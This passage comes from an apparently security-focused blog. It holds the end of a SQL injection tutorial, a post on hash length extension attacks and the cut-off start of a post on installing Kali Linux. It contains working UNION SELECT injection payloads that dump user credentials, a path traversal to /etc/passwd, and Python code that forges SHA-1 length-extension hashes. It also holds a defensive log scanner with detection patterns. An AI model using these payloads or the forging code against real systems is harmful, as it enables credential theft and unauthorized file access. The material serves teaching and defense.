<b><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;"><br /></span></b>
<span style="text-align: start; text-indent: 0px;"><span style="color: white; font-family: Calibri; line-height: 15.3333px;"><a href="http://targetsite.com/demo/exams.php?sort=8+/*!50000union*/+/*!50000select*/+1,2,3,4,5,/*%20!50000gROup_cONcat(column_name,0x0a)*/+from+/*!50000inforMAtion_schema*/.columns+/%20*!50000wHEre*/+/*!50000taBLe_name*/=CHAR(117,%20115,%20101,%20114,%20115)--+"> http://targetsite.com/demo/exams.php?sort=8+/*!50000union*/+/*!50000select*/+1,2,3,4,5,/* !50000gROup_cONcat(column_name,0x0a)*/+from+/*!50000inforMAtion_schema*/.columns+/ *!50000wHEre*/+/*!50000taBLe_name*/=CHAR(117,%20115,%20101,%20114,%20115)--+</a></span></span><br />
<b style="text-align: start; text-indent: 0px;"><br /></b>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-eEHnlR8wsNA/V2uZgod_7mI/AAAAAAAAxeQ/SGJ36Kji6SsGYJDO2sY2RcGS7NDyDr4IwCKgB/s1600/10.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="364" src="https://2.bp.blogspot.com/-eEHnlR8wsNA/V2uZgod_7mI/AAAAAAAAxeQ/SGJ36Kji6SsGYJDO2sY2RcGS7NDyDr4IwCKgB/s640/10.jpg" width="640" /></a></div>
<b style="text-align: start; text-indent: 0px;"><br /></b></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
I guess we have reached the 'orgasmic' point, where the next step could take you to a completely different level. Imagine having a list of all the usernames and passwords at your disposal, especially if you have the ADMIN creds. Well, I am not saying anything, but you are intelligent enough to make use of it. So, ready for your final attempt? Here we GO</div>
<div class="ListParagraph" style="margin-bottom: 10.0pt; margin-left: 18.0pt; margin-right: 0cm; margin-top: 12.0pt; mso-add-space: auto; mso-list: l2 level1 lfo4; text-align: justify; text-indent: -18.0pt;">
<!--[if !supportLists]--><b><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-fareast-font-family: Calibri;">Step 3.<span style="font-size: 7pt; font-stretch: normal; font-weight: normal; line-height: normal;"> </span></span></b><!--[endif]--><b><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;">Extracting Data from 'username' & 'password' Columns<o:p></o:p></span></b><br />
<b><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;"><br /></span></b>
<span style="text-align: start; text-indent: 0px;"><span style="color: white; font-family: Calibri; line-height: 15.3333px;"><a href="http://targetsite.com/demo/exams.php?sort=8+/*!50000union*/+/*!50000select*/+1,2,3,4,5,/*!50000gROup_cONcat(username,0x0a,%20password)*/+from+/*!50000users*/--+"> http://targetsite.com/demo/exams.php?sort=8+/*!50000union*/+/*!50000select*/+1,2,3,4,5,/*!50000gROup_cONcat(username,0x0a, password)*/+from+/*!50000users*/--+</a></span></span><br />
<b style="text-align: start; text-indent: 0px;"><br /></b>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-P4emiY4_ARY/V2uZgvvwS_I/AAAAAAAAxeQ/-g1hnfD8bgY9XS6lO4BDXM1OXUFWPCl1ACKgB/s1600/11.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="370" src="https://1.bp.blogspot.com/-P4emiY4_ARY/V2uZgvvwS_I/AAAAAAAAxeQ/-g1hnfD8bgY9XS6lO4BDXM1OXUFWPCl1ACKgB/s640/11.jpg" width="640" /></a></div>
<b style="text-align: start; text-indent: 0px;"><br /></b></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
The data that I am most interested in is:</div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
'<b>admin</b>':'<b>9d4e1e23bd5b727046a9e3b4b7db57bd8d6ee684</b>'</div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
This looks like a SHA-1 hash, which resolves to '<b>pass</b>' once cracked against a wordlist or lookup table. So the final values:<br />
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify;">
Username: <b>admin</b></div>
<div class="MsoNormal" style="text-align: justify;">
Password: <b>pass</b><br />
<b><br /></b></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify;">
Do I need to tell you what to do next!! Just go
find the GOD DAMN admin console and do whatever you wanna do. My Job here is
done. See you again. Till then</div>
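<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
From the defender's side, an added example that is not part of the original post: a Python scanner that strips the MySQL versioned comments (<b>/*!50000union*/</b>) the payloads above use to hide their keywords, then flags UNION SELECT, information_schema access, CHAR() encoding and comment terminators in each request's query string. The access-log lines, client IPs and timestamps are constructed for the demo; the two malicious ones are modelled on the table-enumeration and column-enumeration URLs above.</div>

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# MySQL executes the contents of /*!50000 ... */ on server versions >= 5.00.00,
# but a naive keyword filter (or a regex for "union select") sees only a comment.
# Optional whitespace after "/*" is allowed because logged URLs often carry %20 there.
VERSION_COMMENT = re.compile(r"/\*\s*!\d{0,6}\s*(.*?)\s*\*/", re.S)

# Indicators tied to the payload shape used in this post, checked after normalising.
INDICATORS = [
    ("union_select", re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)),
    ("schema_enum", re.compile(r"\binformation_schema\b", re.I)),
    ("char_encoding", re.compile(r"\bchar\s*\(\s*\d+(?:\s*,\s*\d+)+\s*\)", re.I)),
    ("comment_terminator", re.compile(r"(?:--|#)\s*$")),
]


def normalize(value):
    """Peel off the layers stacked on top of the SQL: a second round of URL
    decoding (double-encoded payloads), then MySQL versioned comments, so that
    /*!50000union*/ /*!50000select*/ is matched as plain 'union select'."""
    text = unquote_plus(value)
    return VERSION_COMMENT.sub(r" \1 ", text)


def scan_request(log_line):
    """Return the indicator names found in the query string of one access-log
    line (common log format), in INDICATORS order; [] when the line is clean."""
    m = re.search(r'"(?:GET|POST)\s+(\S+)', log_line)
    if not m:
        return []
    found = set()
    for _name, raw in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
        sql = normalize(raw)
        for name, pattern in INDICATORS:
            if pattern.search(sql):
                found.add(name)
    return [name for name, _ in INDICATORS if name in found]


# Constructed log lines: one benign request and two modelled on the post's
# table-enumeration and column-enumeration URLs (IPs and timestamps are made up).
LOG_LINES = [
    '10.0.0.5 - - [23/May/2016:01:14:00 -0700] "GET /demo/exams.php?sort=8 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [23/May/2016:01:14:07 -0700] "GET /demo/exams.php?sort=8+/*!50000union*/'
    '+/*!50000select*/+1,2,3,4,5,/*!50000gROup_cONcat(table_name,0x0a)%20*/+from+'
    '/*!50000inforMAtion_schema*/.tables+/*!50000wHEre*/+/*!50000taBLe_scheMA%20*/'
    'like+database()--+ HTTP/1.1" 200 6011',
    '10.0.0.9 - - [23/May/2016:01:14:31 -0700] "GET /demo/exams.php?sort=8+/*!50000union*/'
    '+/*!50000select*/+1,2,3,4,5,/*!50000gROup_cONcat(column_name,0x0a)*/+from+'
    '/*!50000inforMAtion_schema*/.columns+/*!50000wHEre*/+/*!50000taBLe_name*/'
    '=CHAR(117,%20115,%20101,%20114,%20115)--+ HTTP/1.1" 200 5988',
]


def scan_log(lines=LOG_LINES):
    """Map each log line to its indicators; a SIEM rule would alert on any non-empty list."""
    return [scan_request(line) for line in lines]


if __name__ == "__main__":
    for line, hits in zip(LOG_LINES, scan_log()):
        print(hits or "clean", "<-", line[:90])
```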
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<b><span style="font-size: 20.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;">Hasta la vista<o:p></o:p></span></b><br />
<b><span style="font-size: 20.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;"><br /></span></b></div>
</div>
</div>
Posted by Anonymous<br />
<b><span style="font-size: 20.0pt; line-height: 115%;">Secret Life of Hashes Divulged – Length Extension Attack Explained</span></b> (2016-05-23)<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
Sounds interesting, doesn’t it? Well, it does to me, and so I want it penned down. Let’s see how this goes. </div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
If you feel you’ve nailed it after reading through the entire blog, then I can consider diving deeper into the blogging world. It’s my second post within 24 hours and I already feel I was born for it. Let’s not bore you guys with my shit; instead, let’s learn something about a new form of cryptographic attack called the Hash Length Extension Attack.</div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
It all started when I was in Goa, India (an exotic place to be, for sure) a year ago for the null conference. I know, when I say Goa, the only thought that comes to your mind is the beaches – pristine blue with golden sand and perhaps a bottle of Goa’s favorite chilled beer, “Kings”. The thought of not attending the conference crossed my mind, but then my boss gave me an intense look and there I was (’coz my employer paid for the trip). I already knew that I was going to hate it, but things changed in the blink of an eye the moment I entered the conference. One of the trainings at this conference was about an attack called a Hash Length Extension Attack. This was the first time I had heard of it, and it kept me on my toes for the entire session. </div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
Halfway through the session, I realized that the attack is not only super awesomely cool, but also conceptually easy to understand and perform. To make your job much easier, there are various modules available over the internet, such as <a href="https://github.com/bwall/HashPump">HashPump</a> and <a href="https://github.com/iagox86/hash_extender">hash_extender</a>. Another module, which I personally like, is hlextend by Stephen Bradshaw; it can be found on <a href="https://github.com/stephenbradshaw/hlextend">GitHub</a>.</div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
As per
Wikipedia, the basic definition of this attack goes by: </div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
“<i>In cryptography and computer security, a
length extension attack is a type of attack where an attacker can use Hash
(message1) and the length of message1 to calculate Hash (message1 </i><i><span style="font-family: "cambria math"; mso-bidi-font-family: "Cambria Math";">∥</span> message2). This attack can be
used to sign a message when a Merkle–Damgard based hash is misused as a message
authentication code, allowing for inclusion of extra information.<o:p></o:p></i></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<i>This attack can be done on hashes with
construction H (secret </i><i><span style="font-family: "cambria math"; mso-bidi-font-family: "Cambria Math";">∥</span>
message) when message and the length of secret is known. Algorithms like MD5,
SHA-1, and SHA-256 that are based on the Merkle–Damgard construction are
susceptible to this kind of attack.”<o:p></o:p></i></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
Before we
begin, a quick go-through on how Hashing works:</div>
<div class="ListParagraphCxSpFirst" style="margin-top: 12.0pt; mso-add-space: auto; mso-list: l0 level1 lfo1; text-align: justify; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal;">
</span></span><!--[endif]-->Hash functions operate on fixed block sizes</div>
<div class="ListParagraphCxSpMiddle" style="margin-top: 12.0pt; mso-add-space: auto; mso-list: l0 level1 lfo1; text-align: justify; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal;">
</span></span><!--[endif]-->Input data is split into fixed-size parts equal
to the block size</div>
<div class="ListParagraphCxSpMiddle" style="margin-top: 12.0pt; mso-add-space: auto; mso-list: l0 level1 lfo1; text-align: justify; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal;">
</span></span><!--[endif]-->If any of these parts is smaller than block size
(mostly the last part), the missing bytes are padded</div>
<div class="ListParagraphCxSpMiddle" style="margin-bottom: 10.0pt; margin-left: 54.0pt; margin-right: 0cm; margin-top: 12.0pt; mso-add-space: auto; mso-list: l1 level1 lfo2; text-align: justify; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "wingdings"; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;">ü<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal;">
</span></span><!--[endif]-->PKCS7</div>
<div class="ListParagraphCxSpMiddle" style="margin-bottom: 10.0pt; margin-left: 54.0pt; margin-right: 0cm; margin-top: 12.0pt; mso-add-space: auto; mso-list: l1 level1 lfo2; text-align: justify; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "wingdings"; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;">ü<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal;">
</span></span><!--[endif]-->Bit Padding</div>
<div class="ListParagraphCxSpMiddle" style="margin-top: 12.0pt; mso-add-space: auto; mso-list: l0 level1 lfo1; text-align: justify; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal;">
</span></span><!--[endif]-->The hash value is simply the internal state of
the hash function after the last block has been processed</div>
<div class="ListParagraphCxSpLast" style="margin-bottom: 10.0pt; margin-left: 54.0pt; margin-right: 0cm; margin-top: 12.0pt; mso-add-space: auto; mso-list: l1 level1 lfo2; text-align: justify; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "wingdings"; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;">ü<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal;">
</span></span><!--[endif]-->Anyone holding the hash can therefore load it back as the internal state, continue adding data + padding, and hash again from there</div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<b><span style="font-size: 20.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;">The Attack:<o:p></o:p></span></b></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
Let’s assume a web application which uses a known hash generated from an unknown secret value concatenated with user-entered input. The purpose of doing so is to check the integrity of the entered value and block any form of manipulation. For example, let’s assume the SHA1 hash value generated, with a secret of unknown length, for the valid parameter value ‘<b>student</b>’ is ‘<b>204036A1EF6E7360E536300EA78C6AEB4A9333DD</b>’. So, if we try to access the below mentioned URL, we get all the details of a student. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-5OsqolFY8DE/V0K2XxcLjSI/AAAAAAAAxIY/FsIk4CW8X4klHeKn7YwE7UEnWg0nj5TQQCLcB/s1600/Link.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://2.bp.blogspot.com/-5OsqolFY8DE/V0K2XxcLjSI/AAAAAAAAxIY/FsIk4CW8X4klHeKn7YwE7UEnWg0nj5TQQCLcB/s1600/Link.jpg" /></a></div>
<br /></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<b>Valid URL</b>: http://127.0.0.1/index.php?param=<b>student</b>&amp;hash=204036A1EF6E7360E536300EA78C6AEB4A9333DD<br />
<br />
Cool! I guess that’s what the application was supposed to do. It’s a valid request after all. Let’s see what happens if we try to play with the <b>‘param’</b> value. Let’s try to access the ‘<b>/etc/passwd</b>’ file using path traversal. What do you think will happen?<br />
<br />
<b>Manipulated URL</b>: http://127.0.0.1/index.php?param=<b>/../../../../etc/passwd</b>&amp;hash=204036A1EF6E7360E536300EA78C6AEB4A9333DD</div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-qx-l5RfZQ8Q/V0K3CKWXhZI/AAAAAAAAxIc/sYUhNdgRa1g0pl_LC8WuJQg4CJwZhVFBwCLcB/s1600/Link2.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://2.bp.blogspot.com/-qx-l5RfZQ8Q/V0K3CKWXhZI/AAAAAAAAxIc/sYUhNdgRa1g0pl_LC8WuJQg4CJwZhVFBwCLcB/s1600/Link2.jpg" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-SaE3jC3zkp4/V0K3X8SXB-I/AAAAAAAAxIg/W2G1ndnqFLEnKV-K_mzOQgpX3Jg8FFAdACLcB/s1600/1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://1.bp.blogspot.com/-SaE3jC3zkp4/V0K3X8SXB-I/AAAAAAAAxIg/W2G1ndnqFLEnKV-K_mzOQgpX3Jg8FFAdACLcB/s1600/1.jpg" /></a></div>
</div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
Oops!! File not found. </div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
Of course! And
did you think it was that easy? So what do you think happened? </div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
Well, the hash check failed: the SHA1 hash we supplied belonged to ‘<b>student</b>’, not to the requested file. In order to perform this attack successfully, we would need a valid SHA1 hash value for ‘<b>/../../../../etc/passwd</b>’, computed over the secret value (whose length is unknown) followed by that string. </div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
And how do you think we get that? Well, the first thing we need to do is guess the length of the secret value; without it, it won’t be possible to generate a valid hash. In such cases, brute forcing the length by trying multiple candidate values can sometimes be possible, depending on the application. </div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
Let’s first see
what all data we already have that might come in handy:</div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
Known Data: <b>student</b></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
Hash of known Data: <b>204036A1EF6E7360E536300EA78C6AEB4A9333DD</b></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
Extended Data: <b>/../../../../etc/passwd<o:p></o:p></b></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
Hash of Extended Data: <b>&lt;unknown&gt;<o:p></o:p></b></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
Length of secret: <b>&lt;unknown&gt;<o:p></o:p></b></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<b><span style="font-size: 20.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;">Great!!</span><o:p></o:p></b></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
If I have to explain it in simple words: the application creates the sha1 hash value '<b>204036A1EF6E7360E536300EA78C6AEB4A9333DD</b>' by concatenating an unknown secret of length ‘<b>X</b>’ with the known data '<b>student</b>'. You wish to append the text '<b>/../../../../etc/passwd</b>' after '<b>student</b>' and also provide a valid hash back to the application, namely the hash it would produce when it concatenates its secret with your provided value (the string '<b>student</b>' followed by '<b>/../../../../etc/passwd</b>').</div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
I hope by now
you already know what our ultimate goal is. Ready for some action!!! Here we
go……</div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
The goal is to read the <b>/etc/passwd</b> file by bypassing the hash integrity check on the param parameter. This is what the script below will automate, using the hlextend module to generate the extended hash values.<a href="https://1.bp.blogspot.com/-iWtqPWjIVLQ/V0K6NN3VzmI/AAAAAAAAxIw/ckBXOUAKjQsCMPpMQxHt9AMKp91xERQGACLcB/s1600/2.jpg" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="https://1.bp.blogspot.com/-iWtqPWjIVLQ/V0K6NN3VzmI/AAAAAAAAxIw/ckBXOUAKjQsCMPpMQxHt9AMKp91xERQGACLcB/s1600/2.jpg" /></a></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<b><span style="font-size: 20.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;">And the
output:</span><o:p></o:p></b><br />
<a href="https://2.bp.blogspot.com/-MGB-F6jlWu8/V0K6o20uaJI/AAAAAAAAxI0/FTIptr9Unys2fvTD_2Yardq1A2r7LEiHACLcB/s1600/3.jpg" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="https://2.bp.blogspot.com/-MGB-F6jlWu8/V0K6o20uaJI/AAAAAAAAxI0/FTIptr9Unys2fvTD_2Yardq1A2r7LEiHACLcB/s1600/3.jpg" /></a><br />
<b><span style="font-size: 20.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;"><br /></span></b></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
Once we access the above displayed URL, the application returns the contents of <b>/etc/passwd</b>:<br />
root:x:0:0:root:/root:/bin/bash<br />
daemon:x:1:1:daemon:/usr/sbin:/bin/sh<br />
bin:x:2:2:bin:/bin:/bin/sh<br />
sys:x:3:3:sys:/dev:/bin/sh<br />
sync:x:4:65534:sync:/bin:/bin/sync<br />
games:x:5:60:games:/usr/games:/bin/sh<br />
man:x:6:12:man:/var/cache/man:/bin/sh<br />
lp:x:7:7:lp:/var/spool/lpd:/bin/sh<br />
mail:x:8:8:mail:/var/mail:/bin/sh<br />
news:x:9:9:news:/var/spool/news:/bin/sh<br />
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh<br />
proxy:x:13:13:proxy:/bin:/bin/sh<br />
www-data:x:33:33:www-data:/var/www:/bin/sh<br />
backup:x:34:34:backup:/var/backups:/bin/sh<br />
list:x:38:38:Mailing List Manager:/var/list:/bin/sh<br />
irc:x:39:39:ircd:/var/run/ircd:/bin/sh<br />
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh<br />
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh<br />
libuuid:x:100:101::/var/lib/libuuid:/bin/sh<br />
dhcp:x:101:102::/nonexistent:/bin/false<br />
syslog:x:102:103::/home/syslog:/bin/false<br />
klog:x:103:104::/home/klog:/bin/false<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-uzR0SmGhDYo/V0K62dIUU1I/AAAAAAAAxI8/JsbZETVamRkH_W8VXVBwR9b7pDdiO_AowCLcB/s1600/4.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://4.bp.blogspot.com/-uzR0SmGhDYo/V0K62dIUU1I/AAAAAAAAxI8/JsbZETVamRkH_W8VXVBwR9b7pDdiO_AowCLcB/s1600/4.jpg" /></a></div>
<br /></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
</div>
You may notice
that the new value produced above contains a lot of additional data between the '<b>student</b>' and the '<b>/../../../../etc/passwd</b>': in this
case a 0x80 byte, followed by a run of 0x00 bytes and then the message length (the
length, in bits, of the key plus the original message), appended at the end. This is the hex-encoded padding that the
hash algorithm itself appends to its input before compressing the final block, and it has to be included in the forged data in order
for the attack to work. So, strictly speaking, you can't
specify the EXACT value to append, only what comes after the padding, but under
the right circumstances the application will simply ignore this extra padding.</div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
So, in short, if
the hash algorithm used is vulnerable (a Merkle-Damgård construction such as MD5, SHA-1 or SHA-256, whose digest is nothing more than its final internal state), it is possible to achieve this without
knowing the secret value, as long as you know (or can guess, perhaps by brute
force) the length of that secret value. This is called a hash length extension
attack. Authenticating with an HMAC instead of a bare H(secret || message) is not affected by it.</div>
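To make the padding concrete, here is an added worked example; it is not code from the original post or from the tool shown in the screenshots. It is a minimal SHA-1 that can resume from a known digest, used to forge H(key || 'student' || padding || '/../../../../etc/passwd') given only the original digest and the key length. SHA-1 is assumed here as the vulnerable algorithm; MD5 and SHA-256 work the same way, differing only in the compression function and in the byte order of the encoded length (MD5 stores it little-endian). The secret inside demo() is constructed purely so the result can be verified; the attacker-side functions never read it.

```python
import hashlib
import struct

SHA1_IV = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476, 0xC3D2E1F0)


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def sha1_padding(msg_len):
    """The bytes SHA-1 appends to a msg_len-byte message before the final
    block: 0x80, zeros up to 56 mod 64, then the bit length as 8 bytes
    big-endian. This is the 'glue' that shows up between 'student' and
    '/../../../../etc/passwd' in the forged URL."""
    zeros = (56 - (msg_len + 1) % 64) % 64
    return b"\x80" + b"\x00" * zeros + struct.pack(">Q", msg_len * 8)


def sha1_compress(state, block):
    """One SHA-1 compression over a 64-byte block, returning the new state."""
    a, b, c, d, e = state
    w = list(struct.unpack(">16I", block))
    for i in range(16, 80):
        w.append(_rotl(w[i - 3] ^ w[i - 8] ^ w[i - 14] ^ w[i - 16], 1))
    for i in range(80):
        if i < 20:
            f, k = (b & c) | (~b & d), 0x5A827999
        elif i < 40:
            f, k = b ^ c ^ d, 0x6ED9EBA1
        elif i < 60:
            f, k = (b & c) | (b & d) | (c & d), 0x8F1BBCDC
        else:
            f, k = b ^ c ^ d, 0xCA62C1D6
        tmp = (_rotl(a, 5) + f + e + k + w[i]) & 0xFFFFFFFF
        e, d, c, b, a = d, c, _rotl(b, 30), a, tmp
    return tuple((s + v) & 0xFFFFFFFF for s, v in zip(state, (a, b, c, d, e)))


def sha1_from_state(state, data, total_len):
    """Finish SHA-1 starting from an internal state: hash `data`, then the
    padding for a message that is total_len bytes long overall."""
    data += sha1_padding(total_len)
    for off in range(0, len(data), 64):
        state = sha1_compress(state, data[off:off + 64])
    return "".join("%08x" % word for word in state)


def length_extend(orig_digest_hex, key_len, orig_msg, extra):
    """Given H(key || orig_msg) and len(key) only, return the message suffix
    and the digest for H(key || orig_msg || glue || extra)."""
    # The digest *is* the internal state after the last padded block.
    state = struct.unpack(">5I", bytes.fromhex(orig_digest_hex))
    glue = sha1_padding(key_len + len(orig_msg))
    forged_msg = orig_msg + glue + extra
    forged_digest = sha1_from_state(state, extra, key_len + len(forged_msg))
    return forged_msg, forged_digest


def server_check(secret, msg, digest_hex):
    """The vulnerable server-side check: H(secret || msg) == digest."""
    return hashlib.sha1(secret + msg).hexdigest() == digest_hex


def demo(secret=b"constructed-secret"):
    """Attacker knows only the original (msg, digest) pair and len(secret).
    The secret is a constructed value used solely so the result is checkable."""
    orig_msg = b"student"
    orig_digest = hashlib.sha1(secret + orig_msg).hexdigest()  # as seen in the app
    forged_msg, forged_digest = length_extend(
        orig_digest, len(secret), orig_msg, b"/../../../../etc/passwd")
    return forged_msg, forged_digest, server_check(secret, forged_msg, forged_digest)


if __name__ == "__main__":
    msg, digest, accepted = demo()
    print(msg.hex(), digest, accepted)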
<br />
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<b><span style="font-size: 20.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;">Happy Hacking my Friends!!!<o:p></o:p></span></b></div>
</div>
Anonymoushttp://www.blogger.com/profile/16674553366705399324noreply@blogger.com0tag:blogger.com,1999:blog-2185986060583872831.post-8820562585923473102016-05-18T11:51:00.000-07:002016-06-06T06:21:19.452-07:00Kali linux: BareMetal, Virtualized or USB Stick<div class="MsoNormal">
</div>
<br />
<br />
<br />
<div style="text-align: center;">
<img src="https://www.kali.org/wp-content/uploads/2015/07/kali-vm-images.png" /></div>
<div style="text-align: left;">
<div class="MsoNormal">
<span lang="EN-US">A few days
ago, we had a discussion about the best approach to installing Kali Linux. <o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US">A lot of
people complain about performance in virtualized installations. I have one
word for that: <span style="color: red;"><b>BULLSHIT!</b></span><br /><br /><o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US">I have almost 10 years of pentesting/security
experience and I have never had problems with virtualized installations, except
some years ago with Wi-Fi dongles (we will discuss that later).<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US">Based on my
observations of where and when to install, here are a few ideas to follow:<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"><br /><b>- New to
Linux: </b><o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US">If you are
new to Linux, you should not start with Kali; go back and read this article first:
http://blog.dclabs.com.br/2016/05/wanna-be-pentester.html and the related links. <o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US">From this
point on, I will assume that you have Linux and security skills. <o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US">As
described in the link above, Kali is not a general-purpose or day-to-day
distro, so here is the first point:<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"><br />- As Kali
is not a day-to-day distro, some applications like Skype, Flash Player and
others are not supported by the Kali team; in other words, you would have to add non-official/external
repositories to your Kali in order to install such tools/packages.<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US">Also,
Kali ships tools like calendars, agendas and the like, but these tools are not a
priority.<br />
If you run into problems with this kind of application, expect to wait a
long time for a fix. <br /><br />Obviously,
the best approach is to run Kali virtualized on top of your daily distro or Windows.<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"><br />But before
installing it, please RTFM (Read the Fucking Manual)! It is very common for people
to complain about errors during installation and about performance when, of course,
they are not following the basic recommendations.
http://docs.kali.org/installation/kali-linux-hard-disk-install - check all the
requirements before starting! <o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"><br />If you are
